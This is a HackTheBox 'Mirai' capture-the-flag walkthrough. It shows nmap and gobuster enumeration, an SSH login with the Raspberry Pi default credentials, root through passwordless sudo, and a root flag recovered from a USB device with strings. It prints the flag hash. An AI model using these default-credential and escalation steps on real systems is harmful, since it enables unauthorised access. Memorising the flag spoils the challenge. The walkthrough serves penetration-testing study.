HackTheBox | Mirai
Initial TCP Nmap Scan
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.72s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Website Blocked
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
Initial Thoughts Based On Nmap Scan
Looking at the ports we have 22 SSH, 53 DNS, and 80 HTTP. Looking at SSH, this is a port that I typically look back on but do not jump straight into. The reason for this is usually we need valid credentials or at the least a username so we could attempt to brutefoce a user. Next, DNS is a good port to look into to gain more information about the host. We could perform zone transfers which can reveal a lot of information about a domain. For port 80 HTTP, doing manual enumeration and spidering the website by hand with Burp Suite on while automated scans are running such as gobuster, nikto, etc. to ensure we are using are time wisely would be an important first step. Testing any parameters and anywhere user input can be thrown into is also another good thing to attempt and using characters that may break a web application such as a single quote, double quote, pipe, etc. Also attempting to find any version numbers, checking for default credentials, etc. is something I will be looking out for. I’m going to quickly look at DNS and HTTP and see what is of the most importance and triage from there.
53 - DNS | Enumeration
When looking into DNS, especially if DNS is on TCP, this usually indicates that it is trying to facilitate some sort of DNS zone transfer. So we can try this command:
dig axfr @10.10.10.48 pi.hole
We don’t get anything with zone transfers so I assume there isn’t much with DNS most likely.
80 - HTTP | Enumeration
Navigating to 10.10.10.48 I am presented with just a blank page. Trying to view the page source shows nothing. I decided to go and run a gobuster to potentially find other directories.
gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php
When running my scan the first thing that popped up was an admin directory. Navigating to 10.10.10.48/admin brought me to a page where it seems to be running Pi-Hole. In simple terms, Pi-Hole helps with network-wide ad blocking by having its DNS be a sinkhole that will stop unwanted content such as ads.
Before I start looking into Pi-Hole and manually navigating around, I started another gobuster, but I have it searching through the /admin directory now.
gobuster dir -u http://10.10.10.48/admin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php
The first place I decided to look into was the Login page. I started trying basic passwords like password, password123, etc. No luck with those. I also looked into what the default credentials for Pi-Hole was which is pi:raspberry. No luck there either. I waited for my gobuster scans to finish, but none of these directories or files were of any use. I take a step back for a bit and remember that I could try using these credentials somewhere else, this being SSH.
Access to the Host via SSH and Default Credentials
┌──(root@kali)-[~]
└─# ssh pi@10.10.10.48
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $
And we successfully logged in. As always, before I run any enumeration tools I like to just do a quick sudo -l to see if I am able to execute certain things with sudo permissions.
Privilege Escalation
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
And it tells me that I can just run whatever I want with sudo with no password. I’m just going to type sudo su and get root.
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root
Usually I would just stop here since I got root, but the root.txt isn’t actually just laying in plain sight.
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Finding the root.txt flag.
Within the root.txt file we see something about how apparently this user lost the original root.txt file and is on their USB stick. Since it is talking about a USB stick, I’m going to just use the mount command to see what devices are mounted on the host.
root@raspberrypi:/home/pi# mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
/dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
/dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime)
/dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered)
aufs on / type aufs (rw,noatime,si=3585a36e,noxino)
devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)
Under /dev/sdb we can see there was a usbstick mentioned. We can just use strings against /dev/sdb which will literally read the bits off of the device.
root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
And we see 3d3e483143ff12ec505d026fa13e020b which is the root flag!
Overall this box was pretty straight forward. Boxes that force me to think back and use credentials everywhere is a great thing to get used to as this may definitely be a way in when doing the OSCP exam. I also enjoyed that it wasn’t as simple as running sudo su and grabbing the root.txt flag.